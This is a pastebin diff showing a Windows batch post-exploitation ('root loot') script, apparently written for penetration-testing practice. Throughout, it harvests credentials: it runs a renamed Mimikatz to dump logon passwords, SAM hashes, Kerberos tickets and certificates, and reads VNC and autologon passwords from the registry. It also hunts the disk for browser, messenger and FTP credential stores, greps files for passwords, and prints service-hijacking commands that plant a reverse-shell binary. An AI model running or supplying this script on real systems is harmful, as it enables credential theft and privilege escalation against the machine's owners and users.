API tools faq
paste
View difference between Paste ID: zdjdXcAu and sUuqBGHk
SHOW: | | - or go back to the newest paste.
1
@echo OFF
2
call:credits
3
call:CheckOSbitrate
4
call:CheckOSversion
5
call:checkprerequisitefiles
6
7
call:checkquickwins

8
call:getfirewallinformation

9
call:getcomputerinformation

10
call:dumphashespasseskerberoscerts

11
call:findinterestingfiles

12
call:findinterestingregistrykeys

13
call:findpasswords

14
call:checkweakpermissions

15
call:cleanup

16
goto end

17
18
:credits

19
echo.----------------------------------------------------

20
echo.Author: Jollyfrogs, Brisbane QLD

21
echo.A root loot script I used to learn batch techniquesP, needs TLC

22
echo.----------------------------------------------------

23
echo.

24
goto:eof

25
26
:CheckOSbitrate

27
IF DEFINED ProgramFiles(x86) (set OSbit=64) else (set OSbit=32)

28
goto:eof

29
30
:checkprerequisitefiles

31
REM SOME OF THESE COMMANDS MIGHT GENERATE ERRORS SO WE CATCH THEM ALL HERE

32
echo ====================================================================

33
echo ====================== IGNORE THESE ERRORS =========================

34
dir jollykatz%OSbit%.exe /a/s/b 1> nul 2> NUL

35
IF %ERRORLEVEL% == 0 set jollykatz=1

36
for /f "tokens=1 delims=" %%a in ('whoami') do set whoami=%%a

37
for /f "tokens=1 delims=" %%a in ('netsh /? ^| findstr \.*.irewal.*.*') do set netshfirewall=%%a

38
39
REM

40
REM check registry for the following registry entries:

41
REM

42
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated | Find "0x1" 1> NUL

43
IF %ERRORLEVEL% == 0 (

44
	reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated | Find "0x1" 1> NUL

45
	IF %ERRORLEVEL% == 0 (set alwaysinstallelevated=1)

46
)

47
reg query "HKCU\SOFTWARE\Microsoft\Protected Storage System Provider" /v "Protected Storage" 1>NUL

48
IF %ERRORLEVEL% == 0 (set IE6found=1)

49
reg query "HKCU\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2" 1>NUL

50
IF %ERRORLEVEL% == 0 (set IE7found=1)

51
reg query "HKCU\SOFTWARE\America Online\AIM6\Passwords" 1>NUL

52
IF %ERRORLEVEL% == 0 (set AIM6found=1)

53
reg query "HKCU\SOFTWARE\AIM\AIMPRO" 1>NUL

54
IF %ERRORLEVEL% == 0 (set AIMPROfound=1)

55
reg query "HKCU\SOFTWARE\Beyluxe Messenger" 1>NUL

56
IF %ERRORLEVEL% == 0 (set BEYLUXEfound=1)

57
reg query "HKCU\SOFTWARE\BigAntSoft\BigAntMessenger\Setting" 1>NUL

58
IF %ERRORLEVEL% == 0 (set BIGANTfound=1)

59
reg query "HKCU\SOFTWARE\Camfrog\Client" 1>NUL

60
IF %ERRORLEVEL% == 0 (set CAMFROGfound=1)

61
reg query "HKCU\SOFTWARE\Google\Google Talk\Accounts" 1>NUL

62
IF %ERRORLEVEL% == 0 (set GOOGLETALKfound=1)

63
reg query "HKCU\SOFTWARE\IMVU" 1>NUL

64
IF %ERRORLEVEL% == 0 (set IMVUfound=1)

65
reg query "HKCU\SOFTWARE\Nimbuzz\PCClient\Application" 1>NUL

66
IF %ERRORLEVEL% == 0 (set NIMBUZZfound=1)

67
reg query "HKCU\SOFTWARE\Paltalk" 1>NUL

68
IF %ERRORLEVEL% == 0 (set PALTALKfound=1)

69
reg query "HKCU\SOFTWARE\Yahoo\Pager" 1>NUL

70
IF %ERRORLEVEL% == 0 (set YAHOOPAGERfound=1)

71
reg query "HKCU\SOFTWARE\IncrediMail" 1>NUL

72
IF %ERRORLEVEL% == 0 (set INCREDIMAILfound=1)

73
reg query "HKCU\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook" 1>NUL

74
IF %ERRORLEVEL% == 0 (set OUTLOOK2013found=1)

75
reg query "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messenging Subsystem\Profiles" 1>NUL

76
IF %ERRORLEVEL% == 0 (set OUTLOOK2010POSTNTfound=1)

77
reg query "HKCU\SOFTWARE\Microsoft\Windows Messenging Subsystem\Profiles" 1>NUL

78
IF %ERRORLEVEL% == 0 (set OUTLOOK2010PRENTfound=1)

79
reg query "HKCU\SOFTWARE\Microsoft\Office\Outlookt\OMI Account Manager\Accounts" 1>NUL

80
IF %ERRORLEVEL% == 0 (set OUTLOOK98MAILONLYfound=1)

81
reg query "HKCU\SOFTWARE\Microsoft\Internet Account Manager\Accounts" 1>NUL

82
IF %ERRORLEVEL% == 0 (set OUTLOOK98NORMALfound=1)

83
reg query "HKCU\SOFTWARE\Adobe\Common\10\Sites" 1>NUL

84
IF %ERRORLEVEL% == 0 (set DREAMWEAVERfound=1)

85
reg query "HKCU\SOFTWARE\Google\Google Desktop\Mailboxes\Gmail" 1>NUL

86
IF %ERRORLEVEL% == 0 (set GMAILDESKTOPfound=1)

87
reg query "HKCU\SOFTWARE\DownloadManager\Passwords" 1>NUL

88
IF %ERRORLEVEL% == 0 (set IDMfound=1)

89
reg query "HKCU\SOFTWARE\Google\Picasa" 1>NUL

90
IF %ERRORLEVEL% == 0 (set PICASAfound=1)

91
reg query HKLM\SOFTWARE\RealVNC\vncserver /v Password | Find "Password" 1> NUL

92
IF %ERRORLEVEL% == 0 (set realvncpassfound=1)

93
reg query HKLM\Software\TightVNC\Server /v Password | Find "Password" 1> NUL

94
IF %ERRORLEVEL% == 0 (set tightvncpassfound1=1)

95
reg query HKLM\Software\TightVNC\Server /v PasswordViewOnly | Find "PasswordViewOnly" 1> NUL

96
IF %ERRORLEVEL% == 0 (set tightvncpassfound2=1)

97
reg query HKLM\Software\TigerVNC\WinVNC4 /v Password | Find "Password" 1> NUL

98
IF %ERRORLEVEL% == 0 (set tigervncpassfound=1)

99
reg query HKLM\SOFTWARE\ORL\WinVNC3\Default /v Password | Find "Password" 1> NUL

100
IF %ERRORLEVEL% == 0 (set vnc3passfound1=1)

101
reg query HKLM\SOFTWARE\ORL\WinVNC3 /v Password | Find "Password" 1> NUL

102
IF %ERRORLEVEL% == 0 (set vnc3passfound2=1)

103
reg query HKCU\Software\ORL\WinVNC3 /v Password | Find "Password" 1> NUL

104
IF %ERRORLEVEL% == 0 (set vnc3passfound3=1)

105
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultPassword | Find "DefaultPassword" 1> NUL

106
IF %ERRORLEVEL% == 0 (

107
	For /F "Tokens=2*" %%a In ('reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultPassword') Do set defaultloginpass=%%b	

108
	REM we check if the registry key is not null

109
	IF NOT [%defaultloginpass%] == [] set winautologinpassfound=1

110
	set defaultloginpass=

111
)

112
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultUsername | Find "DefaultUsername" 1> NUL

113
IF %ERRORLEVEL% == 0 (set winautologinuserfound=1)

114
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultDomainname | Find "DefaultDomainname" 1> NUL

115
IF %ERRORLEVEL% == 0 (set winautologindomainfound=1)

116
REM

117
REM

118
echo ====================== IGNORE THESE ERRORS =========================

119
echo ====================================================================

120
echo.

121
goto:eof

122
123
:CheckOSVersion

124
@echo off

125
ver | find "2003" > nul

126
if %ERRORLEVEL% == 0 goto ver_2003

127
ver | find "XP" > nul

128
if %ERRORLEVEL% == 0 goto ver_xp

129
ver | find "2000" > nul

130
if %ERRORLEVEL% == 0 goto ver_2000

131
ver | find "NT" > nul

132
if %ERRORLEVEL% == 0 goto ver_nt

133
if not exist %SystemRoot%\system32\systeminfo.exe goto versioncheckwarnthenexit

134
systeminfo | find "OS Name" > %TEMP%\osname.txt

135
FOR /F "usebackq delims=: tokens=2" %%i IN (%TEMP%\osname.txt) DO set vers=%%i

136
echo %vers% | find "Windows 7" > nul

137
if %ERRORLEVEL% == 0 goto ver_7

138
echo %vers% | find "Windows Server 2008" > nul

139
if %ERRORLEVEL% == 0 goto ver_2008

140
echo %vers% | find "Windows Vista" > nul

141
if %ERRORLEVEL% == 0 goto ver_vista

142
goto warnthenexit

143
:ver_7

144
:Run Windows 7 specific commands here.

145
set OSVersion=WIN7

146
goto versioncheckexit

147
:ver_2008

148
:Run Windows Server 2008 specific commands here.

149
set OSVersion=WIN2008

150
goto versioncheckexit

151
:ver_vista

152
:Run Windows Vista specific commands here.

153
set OSVersion=WINVISTA

154
goto versioncheckexit

155
:ver_2003

156
:Run Windows Server 2003 specific commands here.

157
set OSVersion=WIN2003

158
goto versioncheckexit

159
:ver_xp

160
:Run Windows XP specific commands here.

161
set OSVersion=WINXP

162
goto versioncheckexit

163
:ver_2000

164
:Run Windows 2000 specific commands here.

165
set OSVersion=WIN2000

166
goto versioncheckexit

167
:ver_nt

168
:Run Windows NT specific commands here.

169
set OSVersion=WINNT

170
goto versioncheckexit

171
:versioncheckwarnthenexit

172
set OSVersion=UNDETERMINED

173
goto:versioncheckexit

174
:versioncheckexit

175
goto:eof

176
177
:checkquickwins

178
	systeminfo > systeminfo.txt

179
	REM === Generic tests across all Windows versions here

180
	IF DEFINED alwaysinstallelevated (

181
		echo **** !!! VULNERABLE TO ALWAYSINSTALLELEVATED !!! ****

182
		set alwaysinstallelevated=

183
		echo.

184
	)

185
	IF DEFINED realvncpassfound (

186
		echo **** !!! REALVNC PASS FOUND !!! ****

187
		reg query HKLM\SOFTWARE\RealVNC\vncserver /v Password | Find "Password"

188
		echo ************************************

189
		set realvncpassfound=

190
		echo.

191
	)

192
	IF DEFINED tightvncpassfound1 (

193
		echo **** !!! TIGHTVNC PASS FOUND !!! ****

194
		reg query HKLM\Software\TightVNC\Server /v Password | Find "Password"

195
		echo *************************************

196
		set tightvncpassfound1=

197
		echo.

198
	)

199
	IF DEFINED tightvncpassfound2 (

200
		echo **** !!! TIGHTVNC VIEWONLY PASS FOUND !!! ****

201
		reg query HKLM\Software\TightVNC\Server /v PasswordViewOnly | Find "PasswordViewOnly"

202
		echo **********************************************

203
		set tightvncpassfound2=

204
		echo.

205
	)

206
	IF DEFINED tigervncpassfound (

207
		echo **** !!! TIGERVNC PASS FOUND !!! ****

208
		reg query HKLM\Software\TigerVNC\WinVNC4 /v Password | Find "Password"

209
		echo *************************************

210
		set tigervncpassfound=

211
		echo.

212
	)

213
	IF DEFINED vnc3passfound1 (

214
		echo **** !!! VNC3 PASS FOUND !!! ****

215
		reg query HKLM\SOFTWARE\ORL\WinVNC3\Default /v Password | Find "Password"

216
		echo *********************************

217
		set vnc3passfound1=

218
		echo.

219
	)

220
	IF DEFINED vnc3passfound2 (

221
		echo **** !!! VNC3 PASS FOUND !!! ****

222
		reg query HKLM\SOFTWARE\ORL\WinVNC3 /v Password | Find "Password"

223
		echo *********************************

224
		set vnc3passfound2=

225
		echo.

226
	)

227
	IF DEFINED vnc3passfound3 (

228
		echo **** !!! VNC3 PASS FOUND !!! ****

229
		reg query HKCU\Software\ORL\WinVNC3 /v Password | Find "Password"

230
		echo *********************************

231
		set vnc3passfound3=

232
		echo.

233
	)

234
	IF DEFINED winautologinpassfound (

235
		echo **** !!! WINDOWS AUTOLOGIN PASS FOUND !!! ****

236
		reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultPassword | Find "DefaultPassword"

237
		echo **********************************************

238
239
		IF DEFINED Winautologinuserfound (

240
			reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultUsername | Find "DefaultUsername"

241
			set winautologinuserfound=

242
		)

243
244
		IF DEFINED winautologindomainfound (

245
			reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultDomainname | Find "DefaultDomainname"

246
			set winautologindomainfound=

247
		)

248
249
		set winautologinpassfound=

250
	)

251
goto:eof

252
	if %OSVersion%==WINXP (

253
		REM Maybe we can do something nice with this, haven't found a really good use yet other than it does work, too many KB's and interdependencies on KB patches

254
		REM for /f "tokens=1 delims=" %%a in ('type systeminfo.txt ^| findstr /C:"KB147222"') do set MYKB=%%a

255
		REM if NOT DEFINED MYKB echo == VULNERABLE TO KBasfjsdfj

256
		REM set MYKB=

257
		REM echo.

258
	)

259
goto:eof

260
261
:getfirewallinformation

262
echo.

263
IF DEFINED netshfirewall (

264
		echo.

265
		echo.Firewall Status

266
		echo.---------------

267
		netsh firewall show state

268
		echo.

269
		echo.

270
		echo.Firewall configuration details

271
		echo.------------------------------

272
		echo.

273
		netsh firewall show config

274
		echo.

275
	) ELSE (

276
		echo === NOTE: The netsh firewall command was not found, skipping checks ===

277
	)

278
echo.

279
goto:eof

280
281
:getcomputerinformation

282
echo.

283
echo.This computer is running %OSbit%-bit Windows

284
echo.

285
IF DEFINED whoami (

286
	echo.

287
	echo.Are we running an elevated command prompt?

288
	echo.------------------------------------------

289
	for /f "tokens=1 delims=" %%a in ('whoami /groups ^| findstr \.*High.Man') do set runningelevatedprompt=%%a

290
		IF DEFINED runningelevatedprompt (

291
				echo YES, we ARE!

292
			) ELSE (

293
				echo Sadly, no...

294
			)

295
		echo.

296
		echo.User Groups

297
		echo.-----------

298
		whoami /groups

299
		echo.

300
	) ELSE (

301
		echo === NOTE: The whoami command was not found, skipping checks ===

302
	)

303
echo.

304
echo.User Accounts

305
echo.-------------

306
net users

307
echo.

308
echo.Systeminfo

309
echo.----------

310
systeminfo

311
echo.

312
echo.Netstat -ano

313
echo.------------

314
netstat -ano

315
echo.

316
echo.Scheduled tasks

317
echo.---------------

318
schtasks /query /fo LIST /v

319
echo.

320
echo.Task to service mapping

321
echo.-----------------------

322
tasklist /SVC

323
echo.

324
echo.Network settings

325
echo.----------------

326
ipconfig /all

327
echo.

328
echo.Running windows services

329
echo.------------------------

330
net start

331
echo.

332
echo.Listing Windows drivers

333
echo.-----------------------

334
DRIVERQUERY

335
echo.

336
echo.Dumping Windows registry to registrydump.txt

337
echo.--------------------------------------------

338
reg query HKLM /s > registrydump.txt

339
reg query HKCU /s >> registrydump.txt

340
echo.

341
echo.Environment variables

342
echo.---------------------

343
set

344
echo.

345
echo.Group Policy

346
echo.------------

347
gpresult /R 1>2>NUL

348
IF %ERRORLEVEL% == 1 (

349
	REM WINXP

350
	gpresult

351
) ELSE (

352
	REM WIN7

353
	gpresult /R

354
)

355
echo.

356
REM ** ALEX TO ADD CREDENUMERATE **

357
goto:eof

358
359
:dumphashespasseskerberoscerts

360
echo.Hashes, passwords, kerberos tickets and certificates

361
echo.-----------------

362
IF NOT DEFINED jollykatz echo === NOTE: Jollykatz%OSbit%.exe not found, skipping jollykatz checks ===

363
IF NOT DEFINED jollykatz goto:eof

364
echo.

365
echo.sekurlsa::logonPasswords full

366
echo.------

367
jollykatz%OSbit%.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"

368
echo.

369
echo.lsadump::sam

370
echo.------

371
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

372
echo.

373
echo.sekurlsa::tickets /export

374
echo.------

375
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "sekurlsa::tickets /export" "exit"

376
echo.

377
echo.crypto::certificates /export (CERT_SYSTEM_STORE_CURRENT_USER)

378
echo.------

379
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_CURRENT_USER /store:my /export" "exit"

380
echo.

381
echo.crypto::certificates /export (CERT_SYSTEM_STORE_LOCAL_MACHINE)

382
echo.------

383
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE /store:my /export" "exit"

384
echo.

385
echo.crypto::certificates /export (CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE)

386
echo.------

387
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE /store:my /export" "exit"

388
echo.

389
echo.crypto::certificates /export (CERT_SYSTEM_STORE_USERS)

390
echo.------

391
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_USERS /store:my /export" "exit"

392
echo.

393
goto:eof

394
395
:findinterestingfiles

396
echo.Interesting files and directories

397
echo.---------------------------------

398
dir C:\* /a/s/b > dirlisting.txt

399
type dirlisting.txt | findstr /I \.*proof[.]txt$

400
type dirlisting.txt | findstr /I \.*network-secret[.]txt$

401
type dirlisting.txt | findstr /I \.*ssh.*[.]ini$

402
type dirlisting.txt | findstr /I \.*ultravnc[.]ini$

403
type dirlisting.txt | findstr /I \.*vnc[.]ini$

404
type dirlisting.txt | findstr /I \.*bthpan[.]sys$

405
type dirlisting.txt | findstr /I \.*\\repair$

406
type dirlisting.txt | findstr /I \.*passw*. | findstr /VI \.*.chm$ | findstr /VI \.*.log$ | findstr /VI \.*.dll$ | findstr /VI \.*.exe$

407
type dirlisting.txt | findstr /I \.*[.]vnc$

408
type dirlisting.txt | findstr /I \.*groups[.]xml$

409
type dirlisting.txt | findstr /I \.*printers[.]xml$

410
type dirlisting.txt | findstr /I \.*drives[.]xml$

411
type dirlisting.txt | findstr /I \.*scheduledtasks[.]xml$

412
type dirlisting.txt | findstr /I \.*services[.]xml$

413
type dirlisting.txt | findstr /I \.*datasources[.]xml$

414
type dirlisting.txt | findstr /I \.*.rsa.*[.].*$ | findstr /VI \.*.dll$ | findstr /VI \.*.rat$

415
type dirlisting.txt | findstr /I \.*.dsa.*[.].*$ | findstr /VI \.*.dll$ | findstr /VI \.*.exe$ | findstr /VI \.*.gif$ | findstr /VI \.*.handsafe[.]reg$

416
type dirlisting.txt | findstr /I \.*[.]dbx$

417
type dirlisting.txt | findstr /I \.*.account.*.$ | findstr /VI \.*.User.Account.Picture.*. | findstr /VI \.*.bmp$

418
type dirlisting.txt | findstr /I \.*ntds[.].*$

419
type dirlisting.txt | findstr /I \.*hiberfil[.].*$

420
type dirlisting.txt | findstr /I \.*boot[.]ini$

421
type dirlisting.txt | findstr /I \.*win[.]ini$

422
type dirlisting.txt | findstr /I \.*.\\config\\RegBack

423
type dirlisting.txt | findstr /I \.*.\\CCM\\logs

424
type dirlisting.txt | findstr /I \.*.\\iis.[.]log$

425
type dirlisting.txt | findstr /I \.*.\\Content.IE.\\index.dat$

426
type dirlisting.txt | findstr /I \.*.\\inetpub\\logs\\LogFiles

427
type dirlisting.txt | findstr /I \.*.\\httperr\\httpe.*.[.]log$

428
type dirlisting.txt | findstr /I \.*.\\logfiles\\w3svc1\\ex.*.[.]log$

429
type dirlisting.txt | findstr /I \.*.\\Panther\\ | findstr /VI \.*.Resources\\Themes\\.*.

430
type dirlisting.txt | findstr /I \.*.syspre.*,[.]...$

431
type dirlisting.txt | findstr /I \.*.unatten.*.[.]txt$

432
type dirlisting.txt | findstr /I \.*.unatten.*.[.]xml$

433
type dirlisting.txt | findstr /I \.*Login.Data$

434
type dirlisting.txt | findstr /I \.*Web.Data$

435
type dirlisting.txt | findstr /I \.*Credentials.Store$

436
type dirlisting.txt | findstr /I \.*Credential.Store$

437
type dirlisting.txt | findstr /I \.*Microsoft\\Credentials.*

438
REM Avant Browser:

439
type dirlisting.txt | findstr /I \.*forms[.]dat[.]vdt$

440
type dirlisting.txt | findstr /I \.*default\\formdata\\forms[.]dat$

441
REM Comodo Dragon

442
type dirlisting.txt | findstr /I \.*Dragon\\User.Data\\Default.*

443
REM CoolNovo

444
type dirlisting.txt | findstr /I \.*ChromePlus\\User.Data\\Default.*

445
REM Firefox

446
type dirlisting.txt | findstr /I \.*Firefox\\Profiles\\.*[.]default$

447
type dirlisting.txt | findstr /I \.*key3[.]db$

448
REM Flock Browser

449
type dirlisting.txt | findstr /I \.*Flock\\User.Data\\Default.*

450
REM Google Chrome

451
type dirlisting.txt | findstr /I \.*Chrome\\User.Data\\Default.*

452
type dirlisting.txt | findstr /I \.*Chrome.SXS\\User.Data\\Default.*

453
REM Internet Explorer

454
type dirlisting.txt | findstr /I \.*Microsoft\\Credentials.*

455
REM Maxthon

456
type dirlisting.txt | findstr /I \.*MagicFill.*

457
type dirlisting.txt | findstr /I \.*MagicFill2[.]dat$

458
REM Opera

459
type dirlisting.txt | findstr /I \.*Wand[.]dat$

460
REM Safari

461
type dirlisting.txt | findstr /I \.*keychain[.]plist$

462
REM SeaMonkey

463
type dirlisting.txt | findstr /I \.*signons[.]sqlite$

464
REM AIM

465
type dirlisting.txt | findstr /I \.*aimx[.]bin$

466
REM Digsby

467
type dirlisting.txt | findstr /I \.*logininfo[.]yaml$

468
type dirlisting.txt | findstr /I \.*digsby[.]dat$

469
REM Meebo Notifier

470
type dirlisting.txt | findstr /I \.*MeeboAccounts[.]txt$

471
REM Miranda IM

472
type dirlisting.txt | findstr /I \.*Miranda\\.*[.]dat$

473
REM MySpace IM

474
type dirlisting.txt | findstr /I \.*MySpace\\IM\\users[.]txt$

475
REM Pidgin

476
type dirlisting.txt | findstr /I \.*Accounts[.]xml$

477
REM Skype

478
type dirlisting.txt | findstr /I \.*Skype.*config[.]xml$

479
REM Tencent QQ

480
type dirlisting.txt | findstr /I \.*Registry[.]db$

481
REM Trillian

482
type dirlisting.txt | findstr /I \.*accounts[.]ini$

483
REM XFire

484
type dirlisting.txt | findstr /I \.*XfireUser[.]ini$

485
REM Foxmail

486
type dirlisting.txt | findstr /I \.*Account[.]stg$

487
type dirlisting.txt | findstr /I \.*Accounts[.]tdat$

488
REM ThunderBird

489
type dirlisting.txt | findstr /I \.*signons[.]sqlite$

490
REM Windows Live Mail

491
type dirlisting.txt | findstr /I \.*[.]oeaccount$

492
REM FileZilla

493
type dirlisting.txt | findstr /I \.*recentservers[.]xml$

494
REM FlashFXP

495
type dirlisting.txt | findstr /I \.*Sites[.]dat$

496
REM FTPCommander

497
type dirlisting.txt | findstr /I \.*Ftplist[.]txt$

498
REM SmartFTP

499
type dirlisting.txt | findstr /I \.*SmartFTP.*[.]xml$

500
REM WS_FTP

501
type dirlisting.txt | findstr /I \.*ws_ftp[.]ini$

502
REM Heroes of Newerth

503
type dirlisting.txt | findstr /I \.*login[.]cfg$

504
REM JDownloader

505
type dirlisting.txt | findstr /I \.*JDownloader.*

506
type dirlisting.txt | findstr /I \.*database[.]script$

507
type dirlisting.txt | findstr /I \.*accounts[.]ejs$

508
REM OrbitDownloader

509
type dirlisting.txt | findstr /I \.*sitelogin[.]dat$

510
REM Seesmic

511
type dirlisting.txt | findstr /I \.*data[.]db$

512
REM SuperPutty

513
type dirlisting.txt | findstr /I \.*sessions[.]xml$

514
REM TweetDeck

515
type dirlisting.txt | findstr /I \.*TweetDeck.*

516
type dirlisting.txt | findstr /I \.*[.]localstorage$

517
echo.

518
goto:eof

519
520
:findinterestingregistrykeys

521
REM Source: securityxploded dot com slash passwordsecrets dot php

522
IF EXIST AIM6found (reg query "HKCU\SOFTWARE\America Online\AIM6\Passwords")

523
IF EXIST AIMPROfound (reg query "HKCU\SOFTWARE\AIM\AIMPRO")

524
IF EXIST IE6found (reg query "HKCU\SOFTWARE\Microsoft\Protected Storage System Provider" /v "Protected Storage")

525
IF EXIST IE7found (reg query "HKCU\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2")

526
IF EXIST BEYLUXEfound (reg query "HKCU\SOFTWARE\Beyluxe Messenger")

527
IF EXIST BIGANTfound (reg query "HKCU\SOFTWARE\BigAntSoft\BigAntMessenger\Setting")

528
IF EXIST CAMFROGfound (reg query "HKCU\SOFTWARE\Camfrog\Client")

529
IF EXIST GOOGLETALKfound (reg query "HKCU\SOFTWARE\Google\Google Talk\Accounts")

530
IF EXIST IMVUfound (reg query "HKCU\SOFTWARE\IMVU")

531
IF EXIST NIMBUZZfound (reg query "HKCU\SOFTWARE\Nimbuzz\PCClient\Application")

532
IF EXIST PALTALKfound (reg query "HKCU\SOFTWARE\Paltalk")

533
IF EXIST YAHOOPAGERfound (reg query "HKCU\SOFTWARE\Yahoo\Pager")

534
IF EXIST INCREDIMAIL (reg query "HKCU\SOFTWARE\IncrediMail")

535
IF EXIST OUTLOOK2013found (reg query "HKCU\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook")

536
IF EXIST OUTLOOK2010POSTNTfound (reg query "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messenging Subsystem\Profiles")

537
IF EXIST OUTLOOK2010PRENTfound (reg query "HKCU\SOFTWARE\Microsoft\Windows Messenging Subsystem\Profiles")

538
IF EXIST OUTLOOK98MAILONLYfound (reg query "HKCU\SOFTWARE\Microsoft\Office\Outlookt\OMI Account Manager\Accounts")

539
IF EXIST OUTLOOK98NORMALfound (reg query "HKCU\SOFTWARE\Microsoft\Internet Account Manager\Accounts")

540
IF EXIST DREAMWEAVERfound (reg query "HKCU\SOFTWARE\Adobe\Common\10\Sites")

541
IF EXIST GMAILDESKTOPfound (reg query "HKCU\SOFTWARE\Google\Google Desktop\Mailboxes\Gmail")

542
IF EXIST IDMfound (reg query "HKCU\SOFTWARE\DownloadManager\Passwords")

543
IF EXIST PICASAfound (reg query "HKCU\SOFTWARE\Google\Picasa")

544
REM

545
546
:findpasswords

547
echo.Searching for passwords (this can take a while)

548
echo.-----------------------------------------------

549
findstr /si pwd= *.xml *.ini *.txt

550
findstr /si password= *.xml *.ini *.txt

551
findstr /si pass= *.xml *.ini *.txt

552
goto:eof

553
554
:checkweakpermissions

555
echo.Searching for weak service permissions (this can take a while)

556
echo.--------------------------------------------------------------

557
if exist serviceexes.txt del serviceexes.txt

558
if exist dirlisting.txt del dirlisting.txt

559
dir \ /a/s/b > dirlisting.txt

560
for /f "tokens=1 delims=," %%a in ('tasklist /SVC /FO CSV ^| findstr /I \.*exe*. ^| findstr /VI "smss.exe csrss.exe winlogon.exe services.exe spoolsv.exe explorer.exe ctfmon.exe wmiprvse.exe msmsgs.exe notepad.exe lsass.exe svchost.exe findstr.exe cmd.exe tasklist.exe"') do (findstr %%a$ | findstr /VI "\.*winsxs\\*.") <dirlisting.txt >> serviceexes.txt

561
REM In the line below we parse serviceexes.txt and check each line for write access. We check write access by appending (writing) nothing to the file, we then use batch logic to test results and output results in echo

562
REM for /f "tokens=*" %%a in (serviceexes.txt) do 2>nul (>>%%a echo off) && (echo === !!! RW access to service executable: %%a !!! ===) || (call)

563
REM Ninja magic to find out if we have write access, only partially reliable so decided to go with cacls instead

564
REM @echo off & 2>nul (>>"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" echo off) && (echo RW access) || (echo no RW access) & echo on

565
566
for /f "tokens=*" %%a in (serviceexes.txt) do (cacls "%%a"|findstr /I "Users:"|findstr /I "W F") && (echo === !!! Write access to service executable: %%a !!! ===) || (call)

567
for /f "tokens=*" %%a in (serviceexes.txt) do (cacls "%%a"|findstr /I "Everyone"|findstr /I "W F") && (echo === !!! Write access to service executable: %%a !!! ===) || (call)

568
569
echo.Files and folder with Read-Write access

570
echo.---------------------------------------

571
dir accesschk.exe /a/s/b 1>2>NUL

572
IF %ERRORLEVEL% == 0 (

573
	echo === NOTE: accesschk.exe not found, skipping accesschk file permissions checks ===

574
	goto:eof

575
)

576
577
	accesschk.exe /accepteula 1>2>NUL

578
	

579
	accesschk.exe -uwqs "Everyone" c:\*.* | findstr /VI "\.*system32\\Setup*. \.*system32\\spool\\PRINTERS*. \.*Registration\\CRMLog*. \.*Debug\\UserMode*. \.*WINDOWS\\Tasks*. \.*WINDOWS\\Temp*. \.*Documents.And.Settings*. \.*RECYCLER*. \.*System.Volume.Information*."

580
	accesschk.exe -uwqs "Users" c:\*.* | findstr /VI "\.*system32\\Setup*. \.*system32\\spool\\PRINTERS*. \.*Registration\\CRMLog*. \.*Debug\\UserMode*. \.*WINDOWS\\Tasks*. \.*WINDOWS\\Temp*. \.*Documents.And.Settings*. \.*RECYCLER*. \.*System.Volume.Information*."

581
	accesschk.exe -uwqs "Authenticated Users" c:\*.*  | findstr /VI \.*System.Volume.Information*. | findstr /VI \.*Documents.And.Settings*.

582
	

583
	echo.Searching for weak service permissions

584
	echo.--------------------------------------

585
	accesschk.exe -uwcqv "Authenticated Users" * | Find "RW " 1> NUL

586
	if %ERRORLEVEL% == 0 (

587
		echo.**** !!! VULNERABLE SERVICES FOUND - Authenticated Users!!! ****

588
		accesschk.exe -uwcqv "Authenticated Users" *

589
		echo.****************************************************************

590
		echo.

591
	)

592
	accesschk.exe /accepteula 1>2>NUL

593
	accesschk.exe -uwcqv "Users" * | Find "RW " 1> NUL

594
	if %ERRORLEVEL% == 0 (

595
		echo.**** !!! VULNERABLE SERVICES FOUND - All Users !!! ****

596
		accesschk.exe -uwcqv "Users" *

597
		echo.*******************************************************

598
		echo.To plant binary in service use:

599
		echo.sc config [service_name] binpath= "C:\rshell.exe"

600
		echo.sc config [service_name] obj= ".\LocalSystem" password= ""

601
		echo.sc qc [service_name] (to verify!)

602
		echo.net start [service_name]

603
		echo.*******************************************************

604
	)

605
	accesschk.exe /accepteula 1>2>NUL

606
	accesschk.exe -uwcqv "Everyone" * | Find "RW " 1> NUL

607
	if %ERRORLEVEL% == 0 (

608
		echo.**** !!! VULNERABLE SERVICES FOUND - Everyone !!! ****

609
		accesschk.exe -uwcqv "Everyone" *

610
		echo.*******************************************************

611
		echo.To plant binary in service use:

612
		echo.sc config [service_name] binpath= "C:\rshell.exe"

613
		echo.sc config [service_name] obj= ".\LocalSystem" password= ""

614
		echo.sc qc [service_name] (to verify!)

615
		echo.net start [service_name]

616
		echo.*******************************************************

617
goto:eof

618
619
:cleanup

620
